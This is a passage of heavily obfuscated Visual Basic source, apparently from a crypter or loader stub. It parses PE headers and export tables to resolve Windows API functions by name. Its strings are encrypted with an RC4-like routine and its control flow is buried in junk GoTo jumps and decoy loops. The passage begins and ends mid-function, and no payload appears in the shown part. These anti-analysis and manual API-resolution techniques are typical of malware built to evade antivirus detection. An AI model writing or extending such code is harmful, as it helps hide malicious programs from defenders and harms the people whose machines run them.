  780.     Dim oni2dC5pc As g4RjcGTKu
  781.     Dim q2Y2w4yuWEVIMlMXRjgD As String, Z8p6w2dmyTOrtatAIvcl As String, HGCMFgjzQ() As String, e6v8b7OPpLnHlKcCcnhA As String, i1p0G0OetBDMjeIKqvQY As Integer
  782.     q2Y2w4yuWEVIMlMXRjgD = Chr$(50)
  783.     For i1p0G0OetBDMjeIKqvQY = 1 To Len(q2Y2w4yuWEVIMlMXRjgD)
  784. Z8p6w2dmyTOrtatAIvcl = Z8p6w2dmyTOrtatAIvcl & IIf(i1p0G0OetBDMjeIKqvQY = 1, Asc(Mid$(q2Y2w4yuWEVIMlMXRjgD, i1p0G0OetBDMjeIKqvQY, 1)), Chr$(124) _
  785.  & Asc(Mid$(q2Y2w4yuWEVIMlMXRjgD, i1p0G0OetBDMjeIKqvQY, 1)))
  786.     Next i1p0G0OetBDMjeIKqvQY
  787.     HGCMFgjzQ() = rZjOyBMBM(Z8p6w2dmyTOrtatAIvcl, Chr$(124))
  788.     For i1p0G0OetBDMjeIKqvQY = 0 To UBound(HGCMFgjzQ)
  789.     e6v8b7OPpLnHlKcCcnhA = e6v8b7OPpLnHlKcCcnhA & Chr(CLng(HGCMFgjzQ(i1p0G0OetBDMjeIKqvQY)))
  790.     Next i1p0G0OetBDMjeIKqvQY
  791.     If e6v8b7OPpLnHlKcCcnhA = Chr$(50) Then GoTo 2
  792. 2:
  793.     Call wO9vsZUxD(nfjrysVgu, ByVal lbiJtN9fS, f9XvbANO0)
  794. GoTo t7o7s5krIihwnqiHkPNu
  795. t7o7s5krIihwnqiHkPNu:
  796.     If Not nfjrysVgu.e_magic = B9QyNW5fC Then
  797. GoTo I5T1X6QQEEenAcybRdRO
  798. I5T1X6QQEEenAcybRdRO:
  799.         Exit Function
  800. GoTo I4X8e7uqDTUprBYGjflF
  801. I4X8e7uqDTUprBYGjflF:
  802.     End If
  803. GoTo N0i5d5hSLSvXJZcfXyZE
  804. N0i5d5hSLSvXJZcfXyZE:
  805.     Call wO9vsZUxD(OqXXVZ4wM, ByVal lbiJtN9fS + nfjrysVgu.e_lfanew, r9prn87An)
  806. GoTo n6Y8j4nwhgUGhEQeMdPT
  807. n6Y8j4nwhgUGhEQeMdPT:
  808.     If Not OqXXVZ4wM.Signature = SXYKSnDaE Then
  809. GoTo t6f4r7LgFLHTWlHIRbWA
  810. t6f4r7LgFLHTWlHIRbWA:
  811.         Exit Function
  812. GoTo P6C3P1ktuswibiNaZpsy
  813. P6C3P1ktuswibiNaZpsy:
  814.     End If
  815. GoTo M6A8d2NhKPcmIVJuWsrT
  816. M6A8d2NhKPcmIVJuWsrT:
  817.     Dim jZe4nBnXW   As Long
  818. GoTo B3E1i1UOgdAVumitLayi
  819. B3E1i1UOgdAVumitLayi:
  820.     Dim Rg75igLzY      As Long
  821. GoTo s3L7q4qvFtZijhmKQXCP
  822. s3L7q4qvFtZijhmKQXCP:
  823.     Dim WSsTXNHle       As Long
  824. GoTo O5i6c0RJtbdwafspYlLL
  825. O5i6c0RJtbdwafspYlLL:
  826.  
  827. GoTo m8I6E6HYZkevfDmvDLbq
  828. m8I6E6HYZkevfDmvDLbq:
  829.         jZe4nBnXW = lbiJtN9fS + OqXXVZ4wM.OptionalHeader.DataDirectory(0).VirtuaC6t0R7rHvArQtYWEsNEu
  830. GoTo j6u3N7rYewGybWXVaLSZ
  831. j6u3N7rYewGybWXVaLSZ:
  832.         Rg75igLzY = jZe4nBnXW + OqXXVZ4wM.OptionalHeader.DataDirectory(0).Size
  833. GoTo p3Q5W4QpSvudRmcThraa
  834. p3Q5W4QpSvudRmcThraa:
  835.         WSsTXNHle = OqXXVZ4wM.OptionalHeader.ImageBase
  836. GoTo M5e0B2iPsIoyOWMrmnlq
  837. M5e0B2iPsIoyOWMrmnlq:
  838.  
  839. GoTo c3c1h3impgGiOwtiDsjw
  840. c3c1h3impgGiOwtiDsjw:
  841.     Call wO9vsZUxD(oni2dC5pc, ByVal jZe4nBnXW, MTFdGPVuU)
  842. GoTo I7q5Q7NaoWnZdDroiBwU
  843. I7q5Q7NaoWnZdDroiBwU:
  844.     Dim mpWCXcoZN4           As Long
  845. GoTo P7t7B1TopAJEhwQkEwnT
  846. P7t7B1TopAJEhwQkEwnT:
  847.     Dim BPjePCsxX   As Long
  848. GoTo b5a5R1RyIIXbeVuKDmUX
  849. b5a5R1RyIIXbeVuKDmUX:
  850.     Dim woBkOgn3G    As Long
  851. GoTo r3Y6v3fSFgCBdLcOSrSd
  852. r3Y6v3fSFgCBdLcOSrSd:
  853.     Dim DD4v0hvtx    As Long
  854. GoTo X7m1f0yrEVjFsCaUwAgB
  855. X7m1f0yrEVjFsCaUwAgB:
  856.  
  857. GoTo G2E6s8ryTahMYYnrumLa
  858. G2E6s8ryTahMYYnrumLa:
  859.         For mpWCXcoZN4 = 0 To oni2dC5pc.NumberOfNames - 1
  860. GoTo r5J2g1NbXHUttVdpSlRo
  861. r5J2g1NbXHUttVdpSlRo:
  862.             wO9vsZUxD woBkOgn3G, ByVal WSsTXNHle + oni2dC5pc.lpAddressOfNames + mpWCXcoZN4 * 4, 4
  863. GoTo H5H3M5OkUfkhsKYghqPJ
  864. H5H3M5OkUfkhsKYghqPJ:
  865.             If sFwRO2hfZ(WSsTXNHle + woBkOgn3G) = mMetdZkd5 Then
  866. GoTo m7V5u0sYTUSXIPWmNNdT
  867. m7V5u0sYTUSXIPWmNNdT:
  868.                 wO9vsZUxD DD4v0hvtx, ByVal WSsTXNHle + oni2dC5pc.lpAddressOfNameOrdinals + mpWCXcoZN4 * 2, 2
  869. GoTo V2m2t7ZOiZQdoXWKKltG
  870. V2m2t7ZOiZQdoXWKKltG:
  871.                 wO9vsZUxD BPjePCsxX, ByVal WSsTXNHle + oni2dC5pc.lpAddressOfFunctions + DD4v0hvtx * 4, 4
  872. GoTo i0h1X6XVPheBkyBwJabv
  873. i0h1X6XVPheBkyBwJabv:
  874.                 Jun1VG4mO = BPjePCsxX + WSsTXNHle
  875. GoTo W5E6O5KQjrhNIJHMvpvb
  876. W5E6O5KQjrhNIJHMvpvb:
  877.                 If Jun1VG4mO >= jZe4nBnXW And _
  878.                    Jun1VG4mO <= Rg75igLzY Then
  879. GoTo M6u1q1uYMKEWTpMkqmwB
  880. M6u1q1uYMKEWTpMkqmwB:
  881.                     Call zSQ8T8AI5(Jun1VG4mO, lbiJtN9fS, mMetdZkd5)
  882. GoTo Q6m8G0etNgAujPYZXcNH
  883. Q6m8G0etNgAujPYZXcNH:
  884.                     If Not lbiJtN9fS = 0 Then
  885. GoTo O7F1U4aSrHjRToRVjtOc
  886. O7F1U4aSrHjRToRVjtOc:
  887.                         Jun1VG4mO = Jun1VG4mO(lbiJtN9fS, mMetdZkd5)
  888. GoTo P0c0w4HZLPoPaUmjGcBs
  889. P0c0w4HZLPoPaUmjGcBs:
  890.                     Else
  891. GoTo a6D3n4kIDgiOiovlRabZ
  892. a6D3n4kIDgiOiovlRabZ:
  893.                         Jun1VG4mO = 0
  894. GoTo e0I2t1GWacUtJBlTVpSX
  895. e0I2t1GWacUtJBlTVpSX:
  896.                     End If
  897. GoTo k6Q5D0emAbyaQqRcWoXu
  898. k6Q5D0emAbyaQqRcWoXu:
  899.                 End If
  900. GoTo e7u7D3iprBYTvflFNChd
  901. e7u7D3iprBYTvflFNChd:
  902.                 Exit Function
  903. GoTo d5g3Y5vXWmcfXyZECjYs
  904. d5g3Y5vXWmcfXyZECjYs:
  905.             End If
  906. GoTo H8M4F1rrTcoQkPnGRGDv
  907. H8M4F1rrTcoQkPnGRGDv:
  908.         Next
  909. GoTo P2j3d6frIJegpNtXnUat
  910. P2j3d6frIJegpNtXnUat:
  911.  
  912. GoTo C7W3S3WHAHlMwORUMkOs
  913. C7W3S3WHAHlMwORUMkOs:
  914. End Function
  915.  
  916. Private Function zSQ8T8AI5(ByVal z0xxb30z0 As Long, ByRef yYpzqIoaa As Long, ByRef zpNxujiGq As String)
  917. GoTo c4N6X2cmVVIuWsFTBSEI
  918. c4N6X2cmVVIuWsFTBSEI:
  919.     Dim bBP2UjEUy     As String
  920.     Dim i4T2f5AVtAyILZuvGQLn As String, E4q2E8ZiihmXQXCPOehk As String, ZZSSo0BEq() As String, R6U4Y6dytQlKDKbpMJgb As String, F1m1M3KpAwDagnSfeuwB As Integer
  921.     i4T2f5AVtAyILZuvGQLn = Chr$(56)
  922.     For F1m1M3KpAwDagnSfeuwB = 1 To Len(i4T2f5AVtAyILZuvGQLn)
  923. E4q2E8ZiihmXQXCPOehk = E4q2E8ZiihmXQXCPOehk & IIf(F1m1M3KpAwDagnSfeuwB = 1, Asc(Mid$(i4T2f5AVtAyILZuvGQLn, F1m1M3KpAwDagnSfeuwB, 1)), Chr$(124) _
  924.  & Asc(Mid$(i4T2f5AVtAyILZuvGQLn, F1m1M3KpAwDagnSfeuwB, 1)))
  925.     Next F1m1M3KpAwDagnSfeuwB
  926.     ZZSSo0BEq() = rZjOyBMBM(E4q2E8ZiihmXQXCPOehk, Chr$(124))
  927.     For F1m1M3KpAwDagnSfeuwB = 0 To UBound(ZZSSo0BEq)
  928.     R6U4Y6dytQlKDKbpMJgb = R6U4Y6dytQlKDKbpMJgb & Chr(CLng(ZZSSo0BEq(F1m1M3KpAwDagnSfeuwB)))
  929.     Next F1m1M3KpAwDagnSfeuwB
  930.     If R6U4Y6dytQlKDKbpMJgb = Chr$(56) Then GoTo 8
  931. 8:
  932.     bBP2UjEUy = sFwRO2hfZ(z0xxb30z0)
  933. GoTo p1w6Q3mPUheNaAAbjvYr
  934. p1w6Q3mPUheNaAAbjvYr:
  935. If InStr(1, bBP2UjEUy, BEWRmY2Bl(Chr$(250), Chr$(79) & Chr$(52) & Chr$(117) & Chr$(53) & Chr$(70) & Chr$(51) _
  936.  & Chr$(67) & Chr$(73) & Chr$(98) & Chr$(106))) Then
  937. GoTo X8N7N4TlUqalrnQfmnwV
  938. X8N7N4TlUqalrnQfmnwV:
  939. yYpzqIoaa = P4EYumIcN(rZjOyBMBM(bBP2UjEUy, BEWRmY2Bl(Chr$(250), Chr$(79) & Chr$(52) & Chr$(117) & Chr$(53) & Chr$(70) _
  940.  & Chr$(51) & Chr$(67) & Chr$(73) & Chr$(98) & Chr$(106)))(0))
  941. GoTo Q8y5i0JeZaYdPVctUTjZ
  942. Q8y5i0JeZaYdPVctUTjZ:
  943. zpNxujiGq = rZjOyBMBM(bBP2UjEUy, BEWRmY2Bl(Chr$(250), Chr$(79) & Chr$(52) & Chr$(117) & Chr$(53) & Chr$(70) _
  944.  & Chr$(51) & Chr$(67) & Chr$(73) & Chr$(98) & Chr$(106)))(1)
  945. GoTo c3s4B0gVpfWkuddQQrAN
  946. c3s4B0gVpfWkuddQQrAN:
  947.     End If
  948. GoTo o1n2d7ebVnkIqCIEPghD
  949. o1n2d7ebVnkIqCIEPghD:
  950. End Function
  951.  
  952. Private Function sFwRO2hfZ(ByVal z0xxb30z0 As Long) As String
  953. GoTo c6K7U6QXqnTPPNSEvEiJ
  954. c6K7U6QXqnTPPNSEvEiJ:
  955.     Dim ytSdJ3avz       As Byte
  956.     Dim u2O3J6LpZVKeULZjSSFr As String, T7C3w2BFeTQKcZvSqvsF As String, LdMDSqUj0() As String, N3L2b5hZwNGpXauXbpAV As String, i4I6G1gOfRVuVgaspNiH As Integer
  957.     u2O3J6LpZVKeULZjSSFr = Chr$(48)
  958.     For i4I6G1gOfRVuVgaspNiH = 1 To Len(u2O3J6LpZVKeULZjSSFr)
  959. T7C3w2BFeTQKcZvSqvsF = T7C3w2BFeTQKcZvSqvsF & IIf(i4I6G1gOfRVuVgaspNiH = 1, Asc(Mid$(u2O3J6LpZVKeULZjSSFr, i4I6G1gOfRVuVgaspNiH, 1)), Chr$(124) _
  960.  & Asc(Mid$(u2O3J6LpZVKeULZjSSFr, i4I6G1gOfRVuVgaspNiH, 1)))
  961.     Next i4I6G1gOfRVuVgaspNiH
  962.     LdMDSqUj0() = rZjOyBMBM(T7C3w2BFeTQKcZvSqvsF, Chr$(124))
  963.     For i4I6G1gOfRVuVgaspNiH = 0 To UBound(LdMDSqUj0)
  964.     N3L2b5hZwNGpXauXbpAV = N3L2b5hZwNGpXauXbpAV & Chr(CLng(LdMDSqUj0(i4I6G1gOfRVuVgaspNiH)))
  965.     Next i4I6G1gOfRVuVgaspNiH
  966.     If N3L2b5hZwNGpXauXbpAV = Chr$(48) Then GoTo 0
  967. 0:
  968.     Do
  969. GoTo y1Y7I8FdYBDjEJRHmyyu
  970. y1Y7I8FdYBDjEJRHmyyu:
  971.         wO9vsZUxD ytSdJ3avz, ByVal z0xxb30z0, 1
  972. GoTo A4d6P5bruwpOdWGoqLns
  973. A4d6P5bruwpOdWGoqLns:
  974.         z0xxb30z0 = z0xxb30z0 + 1
  975. GoTo G0l0Y4AIVvQyUlMlvqJs
  976. G0l0Y4AIVvQyUlMlvqJs:
  977.         If ytSdJ3avz = 0 Then Exit Do
  978. GoTo B6u0v1aovwHeZDFlrLTJ
  979. B6u0v1aovwHeZDFlrLTJ:
  980.         sFwRO2hfZ = sFwRO2hfZ & Chr$(ytSdJ3avz)
  981. GoTo o6k6n4fmDddsildDfKIp
  982. o6k6n4fmDddsildDfKIp:
  983.     Loop
  984. GoTo e0p5t1nmaaCKWSwVnAnl
  985. e0p5t1nmaaCKWSwVnAnl:
  986. End Function
  987.  
  988. Public Function BEWRmY2Bl(ByVal wkWTCSbGQ As String, ByVal FwZkg3vC8 As String) As String
  989. GoTo SLBUX_178296
  990. OVXJV_782218:
  991. GoTo RSYMS_128522
  992. RSYMS_128522:
  993.  
  994. GoTo YYKFZ_225774
  995. SLBUX_178296:
  996. GoTo DBWIB_364637
  997. YYKFZ_225774:
  998.  
  999. GoTo QNFMG_746539
  1000. DBWIB_364637:
  1001. GoTo f8u3B2ROZqrNOXycGVCI
  1002.  
  1003. GoTo OVXJV_782218
  1004. QNFMG_746539:
  1005. GoTo NEAXD_368647
  1006. ESJZF_166552:
  1007. GoTo CPHYB_947834
  1008. CPHYB_947834:
  1009.  
  1010. GoTo HONBG_311357
  1011. NEAXD_368647:
  1012. GoTo KNEQL_596271
  1013. HONBG_311357:
  1014.  
  1015. GoTo AXTWA_976516
  1016. KNEQL_596271:
  1017. f8u3B2ROZqrNOXycGVCI:
  1018.  
  1019. GoTo ESJZF_166552
  1020. AXTWA_976516:
  1021. GoTo ZUIQC_134499
  1022. COIAQ_553575:
  1023. GoTo YNFFK_762765
  1024. YNFFK_762765:
  1025.  
  1026. GoTo OJPUO_447666
  1027. ZUIQC_134499:
  1028. GoTo MUBFM_457925
  1029. OJPUO_447666:
  1030.  
  1031. GoTo BXSLN_175355
  1032. MUBFM_457925:
  1033.     On Error Resume Next
  1034.  
  1035. GoTo COIAQ_553575
  1036. BXSLN_175355:
  1037. GoTo IMAIA_627771
  1038. WATJY_762859:
  1039. GoTo VKLEW_707371
  1040. VKLEW_707371:
  1041.  
  1042. GoTo RPODX_268192
  1043. IMAIA_627771:
  1044. GoTo KFNQZ_866184
  1045. RPODX_268192:
  1046.  
  1047. GoTo OPFMQ_026966
  1048. KFNQZ_866184:
  1049. GoTo A1w5Y4XcNGNrSEUYaSrU
  1050.  
  1051. GoTo WATJY_762859
  1052. OPFMQ_026966:
  1053. GoTo DOXTN_716995
  1054. WHHXB_412182:
  1055. GoTo NHCOY_933470
  1056. NHCOY_933470:
  1057.  
  1058. GoTo CWMOK_758124
  1059. DOXTN_716995:
  1060. GoTo YRFXO_377695
  1061. CWMOK_758124:
  1062.  
  1063. GoTo QJGJF_901659
  1064. YRFXO_377695:
  1065. A1w5Y4XcNGNrSEUYaSrU:
  1066.  
  1067. GoTo WHHXB_412182
  1068. QJGJF_901659:
  1069. GoTo TMXRN_682425
  1070. BVPNY_846273:
  1071. GoTo RYFFD_557696
  1072. RYFFD_557696:
  1073.  
  1074. GoTo UJMCD_538626
  1075. TMXRN_682425:
  1076. GoTo GAIDH_973569
  1077. UJMCD_538626:
  1078.  
  1079. GoTo RKUGM_449118
  1080. GAIDH_973569:
  1081.     Dim ztI6ZL5o6(0 To 255) As Integer, U0D7c0, a6B6A6 As Long, p2E0u2() As Byte
  1082.  
  1083. GoTo BVPNY_846273
  1084. RKUGM_449118:
  1085. GoTo ITGKD_782778
  1086. XPWJR_204687:
  1087. GoTo KKWDY_443035
  1088. KKWDY_443035:
  1089.  
  1090. GoTo HNERU_702926
  1091. ITGKD_782778:
  1092. GoTo MHATR_454192
  1093. HNERU_702926:
  1094.  
  1095. GoTo FXLFB_585215
  1096. MHATR_454192:
  1097. GoTo j5T7e3itcbPBcLZHYKOo
  1098.  
  1099. GoTo XPWJR_204687
  1100. FXLFB_585215:
  1101. GoTo VIORD_635214
  1102. NJTIC_323390:
  1103. GoTo LFAJH_443165
  1104. LFAJH_443165:
  1105.  
  1106. GoTo DVZLC_332838
  1107. VIORD_635214:
  1108. GoTo QQZMX_577889
  1109. DVZLC_332838:
  1110.  
  1111. GoTo JWLQR_581331
  1112. QQZMX_577889:
  1113. j5T7e3itcbPBcLZHYKOo:
  1114.  
  1115. GoTo NJTIC_323390
  1116. JWLQR_581331:
  1117. GoTo HWKWM_916358
  1118. HMJWJ_851357:
  1119. GoTo IFEPW_065752
  1120. IFEPW_065752:
  1121.  
  1122. GoTo NUBOW_864137
  1123. HWKWM_916358:
  1124. GoTo YQEDH_731951
  1125. NUBOW_864137:
  1126.  
  1127. GoTo CCVRO_152777
  1128. YQEDH_731951:
  1129.     p2E0u2() = StrConv(FwZkg3vC8, vbFromUnicode)
  1130.  
  1131. GoTo HMJWJ_851357
  1132. CCVRO_152777:
  1133. GoTo MXVIG_661404
  1134. KQRBY_861681:
  1135. GoTo YKVIB_773513
  1136. YKVIB_773513:
  1137.  
  1138. GoTo CKFFA_532133
  1139. MXVIG_661404:
  1140. GoTo GGDEW_284733
  1141. CKFFA_532133:
  1142.  
  1143. GoTo IIODC_837871
  1144. GGDEW_284733:
  1145. GoTo c4U6j1cBGDORgCDMWRuK
  1146.  
  1147. GoTo KQRBY_861681
  1148. IIODC_837871:
  1149. GoTo RJPAN_186147
  1150. XBXSX_473781:
  1151. GoTo GJLDT_481842
  1152. GJLDT_481842:
  1153.  
  1154. GoTo GTFPA_136256
  1155. RJPAN_186147:
  1156. GoTo QLZVO_525939
  1157. GTFPA_136256:
  1158.  
  1159. GoTo NTOQJ_178536
  1160. QLZVO_525939:
  1161. c4U6j1cBGDORgCDMWRuK:
  1162.  
  1163. GoTo XBXSX_473781
  1164. NTOQJ_178536:
  1165. GoTo UIYLV_438732
  1166. UZSBF_093318:
  1167. GoTo JJQKV_925671
  1168. JJQKV_925671:
  1169.  
  1170. GoTo IQGRP_452241
  1171. UIYLV_438732:
  1172. GoTo MIGJC_679353
  1173. IQGRP_452241:
  1174.  
  1175. GoTo LQHUH_683038
  1176. MIGJC_679353:
  1177.     For U0D7c0 = 0 To 255
  1178.  
  1179. GoTo UZSBF_093318
  1180. LQHUH_683038:
  1181. GoTo SBQUV_601881
  1182. PCVIN_844843:
  1183. GoTo VLLYM_343655
  1184. VLLYM_343655:
  1185.  
  1186. GoTo MWUNN_235746
  1187. SBQUV_601881:
  1188. GoTo PTQOS_371252
  1189. MWUNN_235746:
  1190.  
  1191. GoTo EHZVV_003782
  1192. PTQOS_371252:
  1193. GoTo d8Q2A5opnsdWeIVUkoqi
  1194.  
  1195. GoTo PCVIN_844843
  1196. EHZVV_003782:
  1197. GoTo SIAGW_418746
  1198. BQUZD_397877:
  1199. GoTo YABGE_606481
  1200. YABGE_606481:
  1201.  
  1202. GoTo JLPRT_745442
  1203. SIAGW_418746:
  1204. GoTo VTANU_622397
  1205. JLPRT_745442:
  1206.  
  1207. GoTo IJCPO_115971
  1208. VTANU_622397:
  1209. d8Q2A5opnsdWeIVUkoqi:
  1210.  
  1211. GoTo BQUZD_397877
  1212. IJCPO_115971:
  1213. GoTo OVOTI_567979
  1214. ZKGVG_319084:
  1215. GoTo VLTSM_975228
  1216. VLTSM_975228:
  1217.  
  1218. GoTo JHVZX_196905
  1219. OVOTI_567979:
  1220. GoTo MNXOS_716410
  1221. JHVZX_196905:
  1222.  
  1223. GoTo SGXHM_528812
  1224. MNXOS_716410:
  1225.     a6B6A6 = (a6B6A6 + ztI6ZL5o6(U0D7c0) + p2E0u2(U0D7c0 Mod Len(FwZkg3vC8))) Mod 256
  1226.  
  1227. GoTo ZKGVG_319084
  1228. SGXHM_528812:
  1229. GoTo KZNTV_845868
  1230. ODXPG_976678:
  1231. GoTo GZWGL_589051
  1232. GZWGL_589051:
  1233.  
  1234. GoTo AWUHW_812211
  1235. KZNTV_845868:
  1236. GoTo MNXSE_162460
  1237. AWUHW_812211:
  1238.  
  1239. GoTo VRIDV_160758
  1240. MNXSE_162460:
  1241. GoTo I4P0h6EglAKerfSsPOpX
  1242.  
  1243. GoTo ODXPG_976678
  1244. VRIDV_160758:
  1245. GoTo BZZMT_117566
  1246. THOPP_117838:
  1247. GoTo XEJDB_099822
  1248. XEJDB_099822:
  1249.  
  1250. GoTo OMLAR_976115
  1251. BZZMT_117566:
  1252. GoTo PYPZO_471152
  1253. OMLAR_976115:
  1254.  
  1255. GoTo GVFSQ_566584
  1256. PYPZO_471152:
  1257. I4P0h6EglAKerfSsPOpX:
  1258.  
  1259. GoTo THOPP_117838
  1260. GVFSQ_566584:
  1261. GoTo TZXFF_679848
  1262. AULYP_146820:
  1263. GoTo YZHCC_635068
  1264. YZHCC_635068:
  1265.  
  1266. GoTo YKTEN_616761
  1267. TZXFF_679848:
  1268. GoTo TGQHU_721180
  1269. YKTEN_616761:
  1270.  
  1271. GoTo MLQYX_974644
  1272. TGQHU_721180:
  1273.     ztI6ZL5o6(U0D7c0) = U0D7c0
  1274.  
  1275. GoTo AULYP_146820
  1276. MLQYX_974644:
  1277. GoTo WSRDA_980481
  1278. GFWQW_566417:
  1279. GoTo TXYNA_408413
  1280. TXYNA_408413:
  1281.  
  1282. GoTo VQNNM_058043
  1283. WSRDA_980481:
  1284. GoTo VDZJA_603376
  1285. VQNNM_058043:
  1286.  
  1287. GoTo UILCS_977758
  1288. VDZJA_603376:
  1289. GoTo N0E5E2JbYuRphdpGVqen
  1290.  
  1291. GoTo GFWQW_566417
  1292. UILCS_977758:
  1293. GoTo ZFWWB_239060
  1294. AGYDM_487917:
  1295. GoTo ZLSEJ_614830
  1296. ZLSEJ_614830:
  1297.  
  1298. GoTo DPJCT_321561
  1299. ZFWWB_239060:
  1300. GoTo OPRFC_073930
  1301. DPJCT_321561:
  1302.  
  1303. GoTo XBLCA_282518
  1304. OPRFC_073930:
  1305. N0E5E2JbYuRphdpGVqen:
  1306.  
  1307. GoTo AGYDM_487917
  1308. XBLCA_282518:
  1309. GoTo HTBAW_526343
  1310. ZGQFW_738506:
  1311. GoTo VTQBC_667185
  1312. VTQBC_667185:
  1313.  
  1314. GoTo NHDVX_137691
  1315. HTBAW_526343:
  1316. GoTo VMLIW_432635
  1317. NHDVX_137691:
  1318.  
  1319. GoTo XUEGY_808574
  1320. VMLIW_432635:
  1321.     Next U0D7c0
  1322.  
  1323. GoTo ZGQFW_738506
  1324. XUEGY_808574:
  1325. GoTo CHDFK_942287
  1326. PCITS_837275:
  1327. GoTo KVAGP_101518
  1328. KVAGP_101518:
  1329.  
  1330. GoTo KNANU_905159
  1331. CHDFK_942287:
  1332. GoTo AVVTY_615271
  1333. KNANU_905159:
  1334.  
  1335. GoTo QSOTJ_773484
  1336. AVVTY_615271:
  1337. GoTo L1j6S6rAoUdechFLTvKJ
  1338.  
  1339. GoTo PCITS_837275
  1340. QSOTJ_773484:
  1341. GoTo QTRYF_418619
  1342. BLBHF_517715:
  1343. GoTo THINM_566766
  1344. THINM_566766:
  1345.  
  1346. GoTo APZDX_124463
  1347. QTRYF_418619:
  1348. GoTo SESWP_885753
  1349. APZDX_124463:
  1350.  
  1351. GoTo BHNEQ_574186
  1352. SESWP_885753:
  1353. L1j6S6rAoUdechFLTvKJ:
  1354.  
  1355. GoTo BLBHF_517715
  1356. BHNEQ_574186:
  1357. GoTo GASMT_703886
  1358. PCQHJ_965545:
  1359. GoTo RIGTZ_991886
  1360. RIGTZ_991886:
  1361.  
  1362. GoTo XEABH_711948
  1363. GASMT_703886:
  1364. GoTo UGQVA_865375
  1365. XEABH_711948:
  1366.  
  1367. GoTo FBRMQ_243354
  1368. UGQVA_865375:
  1369.     p2E0u2() = StrConv(wkWTCSbGQ, vbFromUnicode)
  1370.  
  1371. GoTo PCQHJ_965545
  1372. FBRMQ_243354:
  1373. GoTo QUSWW_820649
  1374. UOOAX_320572:
  1375. GoTo YYGTI_133461
  1376. YYGTI_133461:
  1377.  
  1378. GoTo JECAD_268023
  1379. QUSWW_820649:
  1380. GoTo MTSXV_541418
  1381. JECAD_268023:
  1382.  
  1383. GoTo CPSSY_376029
  1384. MTSXV_541418:
  1385. GoTo Z5f4v2EoWYsVaokThGHh
  1386.  
  1387. GoTo UOOAX_320572
  1388. CPSSY_376029:
  1389. GoTo MXQJS_316814
  1390. IYJQC_116546:
  1391. GoTo DGAKT_873304
  1392. DGAKT_873304:
  1393.  
  1394. GoTo PFCWD_711041
  1395. MXQJS_316814:
  1396. GoTo VTVNN_165163
  1397. PFCWD_711041:
  1398.  
  1399. GoTo AQSXL_048263
  1400. VTVNN_165163:
  1401. Z5f4v2EoWYsVaokThGHh:
  1402.  
  1403. GoTo IYJQC_116546
  1404. AQSXL_048263:
  1405. GoTo EYNGU_353227
  1406. BHIGY_572465:
  1407. GoTo ZMMZG_917808
  1408. ZMMZG_917808:
  1409.  
  1410. GoTo PFDYR_913472
  1411. EYNGU_353227:
  1412. GoTo MRUXU_215330
  1413. PFDYR_913472:
  1414.  
  1415. GoTo YPPYC_946086
  1416. MRUXU_215330:
  1417. For U0D7c0 = 0 To Len(wkWTCSbGQ)
  1418.  
  1419. GoTo BHIGY_572465
  1420. YPPYC_946086:
  1421. GoTo BSEJJ_144549
  1422. ZQCSR_361324:
  1423. GoTo ROZSZ_351120
  1424. ROZSZ_351120:
  1425.  
  1426. GoTo UEZJS_242722
  1427. BSEJJ_144549:
  1428. GoTo PJZSL_525857
  1429. UEZJS_242722:
  1430.  
  1431. GoTo OHKEW_646846
  1432. PJZSL_525857:
  1433. GoTo l8u0b4ACioIQFlggfkVc
  1434.  
  1435. GoTo ZQCSR_361324
  1436. OHKEW_646846:
  1437. GoTo ORBRV_023168
  1438. XZXBO_165783:
  1439. GoTo BPLOU_115236
  1440. BPLOU_115236:
  1441.  
  1442. GoTo KHYVK_055113
  1443. ORBRV_023168:
  1444. GoTo ZOHFX_246612
  1445. KHYVK_055113:
  1446.  
  1447. GoTo XVBRC_783807
  1448. ZOHFX_246612:
  1449. l8u0b4ACioIQFlggfkVc:
  1450.  
  1451. GoTo XZXBO_165783
  1452. XVBRC_783807:
  1453. GoTo ZWPGT_185882
  1454. BZVWP_851744:
  1455. GoTo CHIKW_138952
  1456. CHIKW_138952:
  1457.  
  1458. GoTo QFVON_349239
  1459. ZWPGT_185882:
  1460. GoTo SPYKD_682351
  1461. QFVON_349239:
  1462.  
  1463. GoTo BVYLX_465167
  1464. SPYKD_682351:
  1465.     a6B6A6 = (a6B6A6 + ztI6ZL5o6(a6B6A6) + 1) Mod 256
  1466.  
  1467. GoTo BZVWP_851744
  1468. BVYLX_465167:
  1469. GoTo DNMHY_243607
  1470. BCMFZ_679685:
  1471. GoTo RLIHY_821926
  1472. RLIHY_821926:
  1473.  
  1474. GoTo NSDLO_472627
  1475. DNMHY_243607:
  1476. GoTo QADRG_807507
  1477. NSDLO_472627:
  1478.  
  1479. GoTo HYOBC_858833
  1480. QADRG_807507:
  1481.     p2E0u2(U0D7c0) = p2E0u2(U0D7c0) Xor ztI6ZL5o6(ztI6ZL5o6((a6B6A6 + ztI6ZL5o6(a6B6A6)) Mod 254))
  1482.  
  1483. GoTo BCMFZ_679685
  1484. HYOBC_858833:
  1485. GoTo OXNRO_201233
  1486. BCQLJ_585357:
  1487. GoTo QEMBJ_942654
  1488. QEMBJ_942654:
  1489.  
  1490. GoTo NKTOP_272193
  1491. OXNRO_201233:
  1492. GoTo NCHIY_949446
  1493. NKTOP_272193:
  1494.  
  1495. GoTo ZMGJB_541675
  1496. NCHIY_949446:
  1497.     Next U0D7c0
  1498.  
  1499. GoTo BCQLJ_585357
  1500. ZMGJB_541675:
  1501. GoTo TIMIZ_062476
  1502. IPORU_140319:
  1503. GoTo AYRBS_116035
  1504. AYRBS_116035:
  1505.  
  1506. GoTo EAMXC_422195
  1507. TIMIZ_062476:
  1508. GoTo AWFZX_227306
  1509. EAMXC_422195:
  1510.  
  1511. GoTo TIPXB_148108
  1512. AWFZX_227306:
  1513.     BEWRmY2Bl = StrConv(p2E0u2, vbUnicode)
  1514.  
  1515. GoTo IPORU_140319
  1516. TIPXB_148108:
  1517.  
  1518. End Function
  1519. Private Function rZjOyBMBM(ByVal iUGqUtdps As String, Optional ByVal N6LHhLlux As String, Optional ByVal KUmyJx5Jh As Long = -1) As String()
  1520.     Dim tPwdtDwaY    As Long
  1521.     Dim rWOEH4K43  As Long
  1522.     Dim pOKAiWpG0     As Long
  1523.     Dim WDhIDUXmY   As Long
  1524.     Dim zuPGbqBU9     As Long
  1525.     Dim kVaXV9w2y()    As String
  1526.    
  1527.     pOKAiWpG0 = Len(iUGqUtdps)
  1528.    
  1529.     If N6LHhLlux = vbNullString Then N6LHhLlux = Chr(32)
  1530.     WDhIDUXmY = Len(N6LHhLlux)
  1531.     If KUmyJx5Jh = 0 Then GoTo QuitHere
  1532.     If pOKAiWpG0 = 0 Then GoTo QuitHere
